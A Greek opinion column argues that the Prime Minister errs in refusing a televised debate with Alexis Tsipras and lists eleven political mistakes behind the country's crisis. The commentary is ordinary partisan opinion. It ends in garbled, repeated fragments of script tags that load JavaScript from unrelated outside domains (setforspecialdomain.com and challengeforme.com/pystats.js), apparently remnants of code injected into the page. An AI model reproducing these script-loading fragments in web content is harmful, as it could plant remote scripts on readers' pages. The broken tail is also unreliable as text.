Σοβαρό τριπλό λάθος του Πρωθυπουργού! Του Θαλή Κουτούπη

0046

Κρίνω πως ο Πρωθυπουργός κάνει τριπλό, θεσμικό, πολιτικό και επικοινωνιακό λάθος, που δεν αποδέχεται την πρόσκληση του Αλ. Τσίπρα σε τηλεμαχία.

Θεσμικά, ο Αλ. Τσίπρας είναι Αρχηγός της Αξιωματικής Αντιπολίτευσης και τέταρτος κατά σειρά Πολιτειακός Παράγων και η άρνηση διαλόγου μαζί του δεν είναι εύστοχη.

Πολιτικά, ο Πρωθυπουργός είναι η μόνη και πιο επίσημη φωνή, που είναι σε θέση να αποστομώσει τα φληναφήματα του Αλέξη Τσίπρα. Το ότι ο Αρχηγός του ΣΥΡΙΖΑ εκτρέπεται συχνά σε βαριές ύβρεις εναντίον του Πρωθυπουργού, δεν είναι ικανό άλλοθι, γιατί οι ύβρεις επιστρέφουν σ’ αυτόν που τις εκτοξεύει.

Επικοινωνιακά, δίνει το δικαίωμα στον Αλ. Τσίπρα να καταγγείλει τον Πρωθυπουργό για αντιδημοκρατική συμπεριφορά και δειλία!

Το διάβολο έχουν στο μυαλό τους οι “Σύμβουλοί” του, που τον παρασύρουν σ’ αυτό το τριπλό, μεγάλο λάθος;

ΤΑ ΔΕΚΑ + ΕΝΑ ΛΑΘΗ, ΠΟΥ -ΚΑΤΑ ΤΗ ΓΝΩΜΗ ΜΟΥ- ΟΔΗΓΗΣΑΝ ΣΤΟ ΕΠΑΠΕΙΛΟΥΜΕΝΟ ΝΑΥΑΓΙΟ

1Ο ΛΑΘΟΣ
Η Κυβέρνηση Καραμανλή, από το 2007 και μετά εκτροχιάζει το δημόσιο έλλειμμα!

2ο ΛΑΘΟΣ
Αργά, αλλά έγκαιρα ακόμη, ο Καραμανλής καταλαβαίνει το λάθος του και καλεί τον Γ. Παπανδρέου σε συνεργασία, για την αποτροπή της κρίσης.

3ο ΛΑΘΟΣ
Ο Γ. Παπανδρέου, σε απάντηση, εκβιάζει εκλογές, με τη μη ψήφιση του Προέδρου Δημοκρατίας.

4ο ΛΑΘΟΣ
Αν και ψηφίζει αρκετές από τις μνημονιακές υποχρεώσεις επί Κυβέρνησης ΠΑΣΟΚ, ο Α. Σαμαράς ξεσπαθώνει εναντίον του Μνημονίου και διαγράφει τη Ντόρα

5ο ΛΑΘΟΣ
Δεν εφαρμόζεται το Μνημόνιο, παρά μόνο τα μέτρα, που δεν προσκρούουν σε οργανωμένα συμφέροντα στο όνομα της πελατοκρατίας και αγνοώντας όλες τις πραγματικά μεταρρυθμιστικές υποχρεώσεις.

6ο ΛΑΘΟΣ
Ο Στέφανος Μάνος κι η Ντόρα Μπακογιάννη δεν τα βρίσκουν, για να κατέβουν μαζί στις εκλογές του Μαΐου και να συμμετάσχουν σε κυβέρνηση με ΝΔ και ΠΑΣΟΚ, αφήνοντας τον ΣΥΡΙΖΑ στο 13%.

7ο ΛΑΘΟΣ
Η αποχώρηση του ΛΑΟΣ απ’ την Κυβέρνηση

8ο ΛΑΘΟΣ
Η αποχώρηση της ΔΗΜΑΡ απ’ την Κυβέρνηση

9ο ΛΑΘΟΣ

Ο ανασχηματισμός του Ιουνίου και το φρενάρισμα της κυβερνητικής δραστηριότητας.

10ο ΛΑΘΟΣ
Η εκβιαστική –αλά ΓΑΠ- πρόκληση πρόωρων εκλογών από τον ΣΥΡΙΖΑ (και άλλες δημοκρατικές δυνάμεις, όπως
π.χ. η Χ.Α), από τις οποίες δεν εξαρτάται η όποια εναλλαγή στην εξουσία, αλλά η τύχη της χώρας.

+ 1 ΛΑΘΟΣ

Ο λαός ψηφίζει με συμβούλους του τη δικαιολογημένη οργή και τον θυμό. Μόνο που αυτοί είναι οι χειρότεροι σύμβουλοι! Παράλληλα νοσταλγεί την αμαρτωλή τριακονταετία και αρκετοί –για να μην πω πολλοί- δείχνουν με τη στάση ζωής τους, ότι δεν έχουν καταλάβει τίποτα ή/και «γλεντάνε» με το μαύρο χρήμα τους και τη δυστυχία των υπολοίπων.

Το χειρότερο είναι ότι και τα 11 αυτά λάθη κρύβουν, εκτός από ανικανότητα και α-νοησία μια οξεία ατομικιστική ιδιοτέλεια!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >